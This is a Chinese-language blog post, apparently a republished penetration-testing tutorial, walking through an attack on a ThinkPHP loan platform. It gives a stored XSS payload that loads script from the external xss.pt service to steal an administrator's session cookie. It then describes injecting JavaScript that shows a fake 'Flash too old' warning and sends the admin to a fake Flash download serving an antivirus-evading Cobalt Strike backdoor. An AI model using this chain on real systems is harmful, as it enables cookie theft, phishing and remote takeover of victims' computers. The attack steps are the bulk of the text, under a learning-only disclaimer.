flash源码

简介

请注意:

本文仅用于技术探讨和研究,笔记中转载的所有终端或服务器均被自身环境渗透。在这项研究中,我将使用Kali Linux作为攻击机器。这里使用的技术仅用于学习和教育目的。如果列出的技术用于任何其他目的,网站和作者概不负责。

名言:

你对这个行业的兴趣决定了你在这个行业的成就!

2021网络安全\渗透测试/安全学习最新安排(全套视频、各大厂商面对面体验、质量手册、必备工具包)I >;关注我,私信回复“资讯”获取

一、前言

网络钓鱼是社会工程攻击的一种,主要通过欺骗、伤害受害者的心理弱点、本能反应、好奇、信任、贪婪等心理陷阱!

网络钓鱼攻击是个人和公司在保护其信息安全时面临的最常见的安全挑战之一。无论是获取密码还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信手段来窃取有价值的数据。

网络钓鱼攻击的增加对所有组织都构成了重大威胁。重要的是,所有组织都应该知道如何找到一些最常见的网络钓鱼诈骗,如果他们想保护他们的信息。还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。

本文主要演示了如何利用XSS植入钓鱼并获得管理员的内部计算机权限!

二、环境介绍

flash源码

黑客(攻击者):

IP:192.168.1.9

系统:卡利2020.4

卡莉作为cs的服务器!

VPS服务器:

Thinkphp平台地址:http://test1.dayuixiyou.cn/

钓鱼地址:http://flash.dayuixiyou.cn

办公室电脑:

系统:windwos7

双网卡:

192.168.175.153

10.10.1.5

目前kali上正在运行Cobalt strike,攻击者在自己的公网VPS服务器上做了后门页面钓鱼。通过渗透,发现thinkphp贷款平台页面存在XSS漏洞。通过插入XSS-js代码,植入链接,黑客最终控制了管理员办公电脑的进程!!

三、XSS演示

示范贷thinkphp平台在公网服务器上!

1、注册账号密码

进入个人中心!

注册用户名和密码!

登录用户名和密码后,普通用户界面!点击设置!

输入结算信息并测试!

2、存在XSS漏洞

输入:

测试结果修改成功!检查前端…

检查源代码——编辑后发现没有变化,XSS代码依然存在……说明存在XSS攻击。

3、注册XSS平台

https://xss.pt/xss.php? Do =登录
进入XSS平台,谷歌还有很多其他平台!!
随意注册账号!

新建一个项目,随意填写!

选择Keepsession以保留会话!
下一步!

需要执行的XSS会弹出…选择标准代码测试!

& lt/tExtArEa & gt;'"& gt& ltsCRiPt sRC=https://xss.pt..aJ & gt& lt/sCrIpT & gt;

4、利用XSS漏洞

& lt/tExtArEa & gt;'"& gt& ltsCRiPt sRC=https://xss.pt/..aJ & gt& lt/sCrIpT & gt;

这一段是有效载荷!将XSS连接信息返回给https://xss.pt平台!

提交信息后,您可以看到网网的XSS已经成功执行…

如果执行成功,XSS平台会收到信息,可见一斑!

5、获取管理员cookie

点击提取现金…

申请和解。成功后,XSS执行代码将被转发到后台结算模块!

当后台管理员访问管理界面,为客户结算资金时,点击提现申请模块!将执行XSS植入的代码!!

这时,返回管理员的cookie和URL信息!

6、cookie登录后台

目录扫描获取管理后台登录页面,被Burp suite分包拦截后!

将XSS平台获取的XSS漏洞植入代码返回的包中,修改网址和cookie信息!

send执行后,通过cookie进入管理员后台!

复制网址!

在浏览器中接入后,正常进入管理员后台!

四、利用XSS钓鱼1、搭建Flash钓鱼页面

在公共服务器上建立一个钓鱼页面,任何可以上网的客户都可以访问该页面!

2、生成免杀后门

用Cobal Strike生成C#语言外壳…

用这个shell混淆,又用python的tinyaes模块混淆,然后分离避免查杀,最后用pyinstaller生成exe shell……必须通过国家杀毒软件!(不演示过程)
把flash的名字改成:flashplayer_install_cn.exe(或者改成update之类吸引人的下载名)。

3、修改Flash源码

这是闪贷平台的源文件目录!!

修改index.html代码并找到href = & # 34修改为:flash player _ install _ cn.exe
,意思是点击页面立即下载即可自动下载目录中的exe后门文件!

准备一个js文件,这意味着在执行js之后,页面上会提示你:

你的FLASH版本太低了。升级后尝试访问此页面!

请访问这个页面:http://flash.dayuixiyou.cn/.

把exe和js都上传到apache的底层,函数网络服务器!
正常读数可以在测试访问中看到。确保内网管理员在执行XSS后可以访问js文件,就可以从这里开始了!

4、利用XSS漏洞植入JS

可以看出,通过使用XSS在(3)中使用的方法来执行插入:

” & gt& lt”
#您需要添加结束” >;& lt”

当& # 34;立即提交& # 34;之后直接执行XSS植入的js文件,提示js中的内容!!

然后点击确定,直接跳转到flash页面!

和(3)中的方法一样,你需要在后台管理页面执行XSS。如果您需要结算金额,让管理员在结算时点击执行XSS!

5.执行XSS下载闪存。

可以看到内网管理员在工作期间登录管理后台。登录管理员用户后,工作职责需要为客户结算金额,点击提现申请。一般客户的安全意识极差!!

单击“完成”后,您的FLASH版本似乎太低。尝试升级并访问此页面!一般情况下,你会点击确定!

确认后跳转到flash页面,逼真的页面!!立即点击下载!!
这里有一个20.1MB的大小信息,只需在html中修改数字和EXE内容的大小即可!

你可以看到后门已经下载了,我没有修改这里的图标。google或者百度用换文件夹器修改成flash安装包的图标更逼真!!
这里的exe完全免杀,连杀毒软件都不能放!!

6.成功的XSS捕鱼

执行安装!

在卡莉攻击机的CS中成功联机,可以看到已经获得了管理员电脑的权限!!

网络安全渗透测试资料一>关注我,私信回复“资料”领取<一五、总结

在这里,通过渗透,我们发现了某平台的XSS漏洞,并利用XSS漏洞植入代码执行,诱骗客服或管理员的内网电脑权限!

至少你需要熟悉如何建站,HTML,js,域名,XSS,无杀,CS4等等才能建站!

所以很多人说flash是经典的钓鱼漏洞,国民警惕性会高很多。所以我还是那句老话,提供思路。如果是破解软件,购买网站,利用虚荣心或者贪小便宜的购物页面等等,会有多少人被抓?

希望大家提高安全意识。没有网络安全,就没有国家安全!

虽然是基本的,但是一定要牢记。

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。

发表回复

登录后才能评论